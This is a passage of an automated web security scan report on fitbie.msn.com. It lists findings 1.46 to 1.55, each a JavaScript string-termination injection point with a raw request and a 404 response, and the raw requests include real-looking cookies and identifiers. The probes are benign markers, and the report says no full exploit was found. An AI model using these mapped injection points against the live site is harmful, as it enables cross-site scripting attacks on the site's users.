X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:28 +0000
ETag: "1297607368-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:29 GMT
Date: Sun, 13 Feb 2011 14:29:29 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/allad207';dc09f024ad?destination=node%2Fallad207';dc09f024ad&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.46. http://fitbie.msn.com/sites/all/modules/rodale/fit_tools/fit_tools.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/rodale/fit_tools/fit_tools.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7df1f'%3b65f3117e84 was submitted in the REST URL parameter 2. This input was echoed as 7df1f';65f3117e84 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all7df1f'%3b65f3117e84/modules/rodale/fit_tools/fit_tools.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:10 +0000
ETag: "1297606690-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:10 GMT
Date: Sun, 13 Feb 2011 14:18:10 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all7df1f';65f3117e84?destination=node%2Fall7df1f';65f3117e84&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.47. http://fitbie.msn.com/sites/all/modules/rodale/fit_tools/tool_helper.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/rodale/fit_tools/tool_helper.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b351'%3b5ead8e0ecba was submitted in the REST URL parameter 2. This input was echoed as 8b351';5ead8e0ecba in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all8b351'%3b5ead8e0ecba/modules/rodale/fit_tools/tool_helper.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/lose-weight/fat-burning-workouts
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69; fsbstat=1; fit_util_reg_dst=fit_tools%2Fdaily_caloriesa2bfc%27%3B4eaeaddbc3; _HOP=I=1&TS=1297606884; s_cc=true; fsbrelated=%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%20title%3D%228%20Diet%20and%20Fitness%20Dares%20to%20Try%22%3E8%20Diet%20and%20Fitness%20Dares%20to%20Try%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/8-diet-and-fitness-dares-try%22%3E%3Cimg%20src%3D%22/sites/default/files/white-water-rafting-th.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%20title%3D%2211%20Reasons%20Spring%20Should%20Come%20Sooner%22%3E11%20Reasons%20Spring%20Should%20Come%20Sooner%3C/a%3E%2C%2C%3Ca%20href%3D%22/slideshow/11-reasons-spring-should-come-sooner%22%3E%3Cimg%20src%3D%22/sites/default/files/subway-commute-safety-th_0.jpg%22%20/%3E%3C/a%3E%7C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%20title%3D%226%20Mini%20Goals%20That%20Yield%20Big%20Results%22%3E6%20Mini%20Goals%20That%20Yield%20Big%20Results%3C/a%3E%2C%2C%3Ca%20href%3D%22/lose-weight/tips/6-mini-goals-yield-big-results%22%3E%3Cimg%20src%3D%22/sites/default/files/raspberries-yogurt-th_0.jpg%22%20/%3E%3C/a%3E; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:29:26 +0000
ETag: "1297607366-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:29:27 GMT
Date: Sun, 13 Feb 2011 14:29:27 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 49283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all8b351';5ead8e0ecba?destination=node%2Fall8b351';5ead8e0ecba&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.48. http://fitbie.msn.com/sites/all/modules/rodale/smartbar/scripts/smartbar.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/rodale/smartbar/scripts/smartbar.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ea25'%3b652feccf332 was submitted in the REST URL parameter 2. This input was echoed as 6ea25';652feccf332 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all6ea25'%3b652feccf332/modules/rodale/smartbar/scripts/smartbar.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:34 +0000
ETag: "1297606714-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:35 GMT
Date: Sun, 13 Feb 2011 14:18:35 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all6ea25';652feccf332?destination=node%2Fall6ea25';652feccf332&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.49. http://fitbie.msn.com/sites/all/modules/rodale/smartbar/stylesheets/smartbar.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/rodale/smartbar/stylesheets/smartbar.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e68f'%3b3b6a94091d1 was submitted in the REST URL parameter 2. This input was echoed as 8e68f';3b6a94091d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all8e68f'%3b3b6a94091d1/modules/rodale/smartbar/stylesheets/smartbar.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:10 +0000
ETag: "1297606690-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:11 GMT
Date: Sun, 13 Feb 2011 14:18:11 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all8e68f';3b6a94091d1?destination=node%2Fall8e68f';3b6a94091d1&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.50. http://fitbie.msn.com/sites/all/modules/views/css/views.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdb9f'%3ba3e3a5182e2 was submitted in the REST URL parameter 2. This input was echoed as cdb9f';a3e3a5182e2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/allcdb9f'%3ba3e3a5182e2/modules/views/css/views.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:13 +0000
ETag: "1297606693-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:14 GMT
Date: Sun, 13 Feb 2011 14:18:14 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/allcdb9f';a3e3a5182e2?destination=node%2Fallcdb9f';a3e3a5182e2&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.51. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/cssloader.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/themes/fitlife/javascripts/cssloader.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4cf1'%3b971aeaa85e6 was submitted in the REST URL parameter 2. This input was echoed as d4cf1';971aeaa85e6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/alld4cf1'%3b971aeaa85e6/themes/fitlife/javascripts/cssloader.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:09 +0000
ETag: "1297606689-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:10 GMT
Date: Sun, 13 Feb 2011 14:18:10 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/alld4cf1';971aeaa85e6?destination=node%2Falld4cf1';971aeaa85e6&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.52. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/fitlife.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/themes/fitlife/javascripts/fitlife.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5195'%3b95e08c3e7d6 was submitted in the REST URL parameter 2. This input was echoed as c5195';95e08c3e7d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/allc5195'%3b95e08c3e7d6/themes/fitlife/javascripts/fitlife.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:11 +0000
ETag: "1297606691-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:12 GMT
Date: Sun, 13 Feb 2011 14:18:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/allc5195';95e08c3e7d6?destination=node%2Fallc5195';95e08c3e7d6&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.53. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.browser.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/themes/fitlife/javascripts/jquery.browser.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b741'%3b1c410d1c975 was submitted in the REST URL parameter 2. This input was echoed as 9b741';1c410d1c975 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all9b741'%3b1c410d1c975/themes/fitlife/javascripts/jquery.browser.min.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:10 +0000
ETag: "1297606690-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:11 GMT
Date: Sun, 13 Feb 2011 14:18:11 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all9b741';1c410d1c975?destination=node%2Fall9b741';1c410d1c975&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.54. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.hoverIntent.minified.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/themes/fitlife/javascripts/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7081d'%3bb1fcee59260 was submitted in the REST URL parameter 2. This input was echoed as 7081d';b1fcee59260 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all7081d'%3bb1fcee59260/themes/fitlife/javascripts/jquery.hoverIntent.minified.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:10 +0000
ETag: "1297606690-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:10 GMT
Date: Sun, 13 Feb 2011 14:18:10 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all7081d';b1fcee59260?destination=node%2Fall7081d';b1fcee59260&" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.55. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.jcarousel.min.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fitbie.msn.com
Path:	/sites/all/themes/fitlife/javascripts/jquery.jcarousel.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 883e8'%3bdd6432054c2 was submitted in the REST URL parameter 2. This input was echoed as 883e8';dd6432054c2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /sites/all883e8'%3bdd6432054c2/themes/fitlife/javascripts/jquery.jcarousel.min.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:18 +0000
ETag: "1297606698-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:19 GMT
Date: Sun, 13 Feb 2011 14:18:19 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
